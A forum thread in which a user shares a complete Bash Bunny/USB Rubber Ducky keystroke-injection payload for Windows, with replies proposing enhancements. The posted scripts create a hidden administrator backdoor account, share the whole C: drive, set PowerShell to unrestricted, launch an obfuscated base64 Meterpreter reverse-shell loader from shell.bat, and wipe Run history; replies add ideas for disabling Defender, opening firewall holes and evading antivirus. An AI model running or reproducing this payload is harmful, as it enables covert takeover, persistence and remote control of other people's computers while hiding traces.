Jump to content
B0rk

[PAYLOAD]USB_Intruder

Recommended Posts

Posting for discussion and feedback. I will be submitting this for approval into the repository in the near future. I have attached a zip containing all necessary files as well for those of you that want to pick it up and run with it.

Read the README below and in the zip first, and post any comments or questions you may have.

-B0rk

README.MD

# USB Intruder for BashBunny and TwinDucky

- Title:         USB Intruder
- Author:        B0rk
- Version:       1.0
- Target:        Windows XP SP3+
- Props:         Hak5Darren, Diggster, IMcPwn
- Category:      Infiltration/Execution

## Description

Infiltrates a target system and performs the following:
Creates a new user with the following credentials - pwnie:dungothacked
Shares the root of the C: drive with full permissions to the new user pwnie with the label HACKED$ (Hidden)
Created a hidden ProgData folder in the %UserProfile%
Sets powershell execution to unrestricted
Copies files from the USB_Intruder directory on the BashBunny to the hidden ProgData folder in the user profile
Executes the eject.ps1 file that properly ejects the Mass Storage portion of the payload
Executes a shell.bat file that is in fact a Meterpreter script calling back to the Attacker's Handler (not going into detail on how to do that)
Cleans up the Run dialogue history

**undo.bat is provided to reverse the first 3 actions above (in case you want to test)**

**Be sure to have your handler ready to accept the incoming connection from the victim**

## Configuration

Replace the shell.bat file in the USB_Intruder folder with your own custom Meterpreter script or what ever bat file you would like.

**You will need to change delays accordingly to the profile of the victim's PC hardware.**

## STATUS

| LED             | Status           |
| --------------- | ---------------- |
| Solid White     | Initialization   |
| Blue Flashing   | HID Phase 1      |
| Solid Magenta   | HID Phase 2      |
| Red Flashing    | Ejecting Storage |
| Solid Cyan      | HID Phase 3      |
| Yellow Flashing | Cleanup of Run   |
| Green Flashing  | Sync/EOF         |
| Solid Green     | 100% Complete    |

payload.txt

#!/bin/bash
#
#TITLE: USB Intruder
#AUTHOR: B0rk
#VERSION: 1.0
#PROPS: Hak5Darren, Diggster, IMcPwn
#OS: Windows (Requires Powershell and Admin Rights)
#ATTACKMODE: HID STORAGE
#
#DESCRIPTION: Opens up attack vectors and a meterpreter powershell script on a Victim PC. **Based on usb_exfiltrator by DK & Friends**
#
#LED INDICATORS:
#White - Initialization
#Blue Blinking - phase 1
#Magenta - phase 2
#Cyan - phase 3
#Yellow Blinking - Cleanup
#Green - Attack Completion

#Initialization - Setting AttackModes
LED W
ATTACKMODE HID STORAGE
#Initialization Completed

#Beginning of phase 1
LED B 10
#Sharing C Drive as HACKED$ and adding user pwnie with password of dungothacked to local Administrators group.
#Also creates a new (hidden) folder in the current user's profile to drop files into for execution later on.
Q DELAY 2000
Q GUI d
Q DELAY 100
Q GUI r
Q DELAY 500
Q STRING powershell -Command "Start-Process cmd -Verb RunAs"
Q ENTER
Q DELAY 800
Q ALT y
Q DELAY 500
Q STRING net user pwnie dungothacked /add
Q ENTER
Q STRING net localgroup Administrators pwnie /add
Q ENTER
Q STRING net share HACKED$=C:\ /grant:pwnie,FULL
Q ENTER
Q STRING mkdir %UserProfile%\\ProgData
Q ENTER
Q STRING attrib +h %UserProfile%\\ProgData
Q ENTER
Q STRING powershell
Q ENTER
Q DELAY 500
Q STRING Set-ExecutionPolicy Unrestricted
Q ENTER
Q STRING exit
Q ENTER
Q STRING exit
Q ENTER
Q DELAY 500
#End of phase 1

#Beginning of phase 2
LED M
#Copying Files from BashBunny to %UserProfile%\ProgData
Q GUI r
Q DELAY 500
Q STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
Q ENTER
Q DELAY 2000
#End of phase 2

#Ejection of Mass Storage
LED R 0
Q GUI d
Q DELAY 250
Q GUI r
Q DELAY 500
Q STRING powershell -Command "Start-Process cmd -Verb RunAs"
Q ENTER
Q DELAY 800
Q ALT y
Q DELAY 800
Q STRING powershell
Q ENTER
Q DELAY 500
Q STRING cd \$Env:UserProfile\\ProgData
Q ENTER
Q STRING .\\eject.ps1
Q ENTER
Q STRING exit
Q ENTER
Q STRING exit
Q ENTER
Q DELAY 500
#End of Ejection

#Beginning of phase 3
LED C
#Running PS script for Remote Shell from %UserProfile%\ProgData Directory.
Q GUI r
Q DELAY 500
Q STRING powershell -Command "Start-Process cmd -Verb RunAs"
Q ENTER
Q DELAY 800
Q ALT y
Q DELAY 800
Q STRING powershell -windowstyle hidden \%userprofile%\\ProgData\\shell.bat
Q ENTER
Q DELAY 200
#End of phase 3

#Cleanup
LED Y 100
#Clears complete run history
Q GUI r
Q DELAY 500
Q STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
Q ENTER
#End of Cleanup

#Completion of script
LED G 100
sync
LED G
#Completed

d.cmd

@echo OFF

REM Setting dst to %BASHBUNNY%\Payload\$Switch_Position\USB_Intruder\
set dst=%~dp0USB_Intruder

REM Copying files from dst to %USERPROFILE%\ProgData
xcopy /C /Q /G /Y /S %dst%\*.* %USERPROFILE%\ProgData\

@cls
@exit

undo.bat (for undoing the first 3 actions of the payload **For Testing Purposes/Not Required**)

net user pwnie /delete
net share HACKED$ /delete
RD /S /Q %UserProfile%\ProgData

Inside the USB_Intruder folder:

eject.ps1

$BB = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BASHBUNNY' } | Select-Object -First 1 -ExpandProperty Driveletter
$driveEject = New-Object -comObject Shell.Application
$driveEject.Namespace(17).ParseName("$BB").InvokeVerb("Eject")

shell.bat (should be replaced with your own meterpreter script)

@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")

 

USB_Intruder.zip

  • Upvote 3

Share this post


Link to post
Share on other sites

I was thinking of doing something like this - passing credentials to a PC to create a user, but then someone *glares at Posh* was like "No you idiot, that can't be done because that was an old type of hack that got patched ages ago!"

But you have shown here that it can be done :)

Share this post


Link to post
Share on other sites
56 minutes ago, Dave-ee Jones said:

I was thinking of doing something like this - passing credentials to a PC to create a user, but then someone *glares at Posh* was like "No you idiot, that can't be done because that was an old type of hack that got patched ages ago!"

But you have shown here that it can be done :)

Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including: 

- The one I previously posted about. That is, making the new user invisible to the Windows logon screen.

- Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter.  EDIT: Actually it looks like meterpreter shell already does this the way it's implemented here. 

- Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder. 

- Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP. 

The possibilities are endless. I guess I just need to break down and order a bunny. 

Edited by rottingsun
  • Upvote 1

Share this post


Link to post
Share on other sites

Lol, don't glare out me.

If you know the credentials and they are on the machine you are attacking that is one thing.

If you want to use the ntlmv2 hash passed by responder or captured by smbserver.py, well those will not work on the same machine if reflected back.  They will work if the login has admin, networked and shot at another machine.  I must have misunderstood what you were trying to do.

If you get the cleartext credentials like with mimikatz, you can use them if they are on the machine and the creds has the access.  Regular NT hash captured locally with hashdump, as I understand, only works on the machine, cannot be passed across the network...anymore.

If they are clear text and you know them, well you can use them anyway you like as long as they have the appropriate access to that machine.  If you were thinking of using credentials to use pure network attack from the BB like wmi to execute commands on the machine, make sure it is prepped for it.  AD Joined machines seem to have no issue because they are setup for remote administration...if the firewall doesn't stop you.  Your home machine you will not be able to talk to it from the network until you add the LocalAccountTokenFilterPolicy to the registry and open firewall to wmi.  If you using something like psexec, sometimes along with the localaccountfilterpolicy reg setting you will need to add 2 more (AutoShareServer and AutoShareWks) to build the admin shares it uses.  Same if you are going to use SMB from the bunny to reverse exfiltrate (have the BB initiate SMB connection to computer and download files, no HID).

Edited by PoSHMagiC0de

Share this post


Link to post
Share on other sites
38 minutes ago, rottingsun said:

Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including: 

- The one I previously posted about. That is, making the new user invisible to the Windows logon screen.

- Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter.  EDIT: Actually it looks like meterpreter shell already does this the way it's implemented here. 

- Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder. 

- Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP. 

The possibilities are endless. I guess I just need to break down and order a bunny. 

Thing is, to create an Admin user you first need Admin rights, therefore you don't really get anywhere with creating a Meterpreter payload.

Anyway, what you could do with that Admin user is tell it to start a remotely-accessible shell, so that you can go home, or hotspot your laptop or just use your phone, and SSH into the PC and do whatever you want as a remote Admin. Would be interesting getting the PC to think of itself as some kind of server so if someone used the PC they wouldn't notice another user logged in and using the PC.

Share this post


Link to post
Share on other sites
2 minutes ago, PoSHMagiC0de said:

Lol, don't glare out me.

If you know the credentials and they are on the machine you are attacking that is one thing.

If you want to use the ntlmv2 hash passed by responder or captured by smbserver.py, well those will not work on the same machine if reflected back.  They will work if the login has admin, networked and shot at another machine.  I must have misunderstood what you were trying to do.

If you get the cleartext credentials like with mimikatz, you can use them if they are on the machine and the creds has the access.  Regular NT hash captured locally with hashdump, as I understand, only works on the machine, cannot be passed across the network...anymore.

If they are clear text and you know them, well you can use them anyway you like as long as they have the appropriate access to that machine.  If you were thinking of using credentials to use pure network connection like wmi to execute commands on the machine, make sure it is prepped for it.  AD Joined machines seem to have no issue because they are setup for remote administration...if the firewall doesn't stop you.  Your home machine you will not be able to talk to it from the network until you add the LocalAccountTokenFilterPolicy to the registry and open firewall to wmi.  If you using something like psexec, sometimes along with the localaccountfilterpolicy reg setting you will need to add 2 more (AutoShareServer and AutoShareWks) to build the admin shares it uses.  Same if you are going to use SMB from the bunny to reverse exfiltrate (have the BB initiate SMB connection to computer and download files, no HID).

We're talking about creating credentials, not using existing ones (unless you need to change the password of one of them).

Share this post


Link to post
Share on other sites
Just now, Dave-ee Jones said:

We're talking about creating credentials, not using existing ones (unless you need to change the password of one of them).

Okay, created ones will work only on that machine.

Share this post


Link to post
Share on other sites
8 minutes ago, Dave-ee Jones said:

Thing is, to create an Admin user you first need Admin rights, therefore you don't really get anywhere with creating a Meterpreter payload.

 

Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description - 

#OS: Windows (Requires Powershell and Admin Rights)

 

This would be a great payload for the case of a target running say Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably alot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin. 

 

Edited by rottingsun

Share this post


Link to post
Share on other sites

Just a first script for the BB for me guys, chill and have an alco beverage or something. No need to get worked up. It's not necessarily meant for a corp env. I appreciate the constructive criticism,  but I had fun and it was just a first step.

Share this post


Link to post
Share on other sites
2 minutes ago, B0rk said:

chill and have an alco beverage or something

I would but I don't wanna be hungover for work tomorrow. :lol:

Share this post


Link to post
Share on other sites

 

14 minutes ago, B0rk said:

Just a first script for the BB for me guys, chill and have an alco beverage or something. No need to get worked up. It's not necessarily meant for a corp env. I appreciate the constructive criticism,  but I had fun and it was just a first step.

Sorry dude, I actually like your script.  Me and Davee go back and forth.  That was just us continuing a previous comment I made about an attack type idea I thought was something else heheh.

Share this post


Link to post
Share on other sites
41 minutes ago, PoSHMagiC0de said:

Okay, created ones will work only on that machine.

I knew that. But a local Administrator is just as powerful as a network Administrator (probably more powerful, as you can remove yourself from the network therefore removing the network Administrator's control).

36 minutes ago, B0rk said:

Just a first script for the BB for me guys, chill and have an alco beverage or something. No need to get worked up. It's not necessarily meant for a corp env. I appreciate the constructive criticism,  but I had fun and it was just a first step.

Yea, it is good, we aren't saying it isn't. :P

We're just speculating/arguing about possible credential attacks we've thought of. Classic Posh and Dave-ee rivalry, lol.

Edited by Dave-ee Jones

Share this post


Link to post
Share on other sites
11 hours ago, Dave-ee Jones said:

Thing is, to create an Admin user you first need Admin rights, therefore you don't really get anywhere with creating a Meterpreter payload.

It doesn't have to be a meterpreter payload, that's the beauty of it. That bat file (shell.bat) can be quite literally anything you want it to be and do what you want it to do.

--Also, I know I'm using the old form of ducky script for the HID commands, but I wanted to make it cross platform and have the ability to be used on a TwinDucky as well.

Share this post


Link to post
Share on other sites

I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned. 

Share this post


Link to post
Share on other sites

You're going to love it (the bashbunny). I'll be modifying this payload in the future (maybe not the near future...) and adding to it as well. Feel free to hit me up on IRC or PM on here - goes for everyone. 

Share this post


Link to post
Share on other sites
On 5/12/2017 at 7:49 AM, B0rk said:

It doesn't have to be a meterpreter payload, that's the beauty of it. That bat file (shell.bat) can be quite literally anything you want it to be and do what you want it to do.

--Also, I know I'm using the old form of ducky script for the HID commands, but I wanted to make it cross platform and have the ability to be used on a TwinDucky as well.

I can suggest some improvements that can not only keep it compatible with the twin ducky but also shorten your Quack commands.

Place all your commands into a powershell script except for the privilege escalation.  Make your first quack commands get you privilege escalated cmd and then the second to pull and run the script from the USB location.  That will make your quack statements only necessary for getting the cmd prompt and running the script.  Cleanup of the registry can even be handled at the end of the script in the script also.  Since it is using USB it will still work for the Twin Duck too.

Share this post


Link to post
Share on other sites
7 hours ago, PoSHMagiC0de said:

I can suggest some improvements that can not only keep it compatible with the twin ducky but also shorten your Quack commands.

Place all your commands into a powershell script except for the privilege escalation.  Make your first quack commands get you privilege escalated cmd and then the second to pull and run the script from the USB location.  That will make your quack statements only necessary for getting the cmd prompt and running the script.  Cleanup of the registry can even be handled at the end of the script in the script also.  Since it is using USB it will still work for the Twin Duck too.

Thanks for the suggestion. I've cut down runtime by 13 or so seconds with that. I did have to keep the creation of the ProgData folder and Hidden attribute in the first part of the cmd prompt phase to allow for a destination of the initial copy, but I'll be updating this again in the near future. I left the shell.bat launch as is since it creates a separate hidden instance for it to run in rather than having it hanging up a script of scripts right at the end (since they're run sequentially).

Share this post


Link to post
Share on other sites

I will be updating my initial post with the new and updated scripts in the near future.

Share this post


Link to post
Share on other sites

Haha, I love this.  I had a feeling so I tried.  I connected to your thread with my Win test VM that is running Avast and it went off like a christmas tree, only on your thread and then ti blocked me from viewing it hehe.  Another test you can try is on your test machine put Avast on it and see if your payloads still run or if they are killed.

Share this post


Link to post
Share on other sites
23 minutes ago, PoSHMagiC0de said:

Haha, I love this.  I had a feeling so I tried.  I connected to your thread with my Win test VM that is running Avast and it went off like a christmas tree, only on your thread and then ti blocked me from viewing it hehe.  Another test you can try is on your test machine put Avast on it and see if your payloads still run or if they are killed.

It should only be blocking the shell.bat file as it is known by AV mfg's. It was only put on there as an example/placeholder (the LHOST is set to 10.10.10.10 and LPORT to 8443). It's just a Veil-Evasion generated payload. Everything else should execute just fine.

Share this post


Link to post
Share on other sites
3 hours ago, B0rk said:

It should only be blocking the shell.bat file as it is known by AV mfg's. It was only put on there as an example/placeholder (the LHOST is set to 10.10.10.10 and LPORT to 8443). It's just a Veil-Evasion generated payload. Everything else should execute just fine.

A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_na_gai meterpreter rev_tcp payload to successfully bypass both. 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...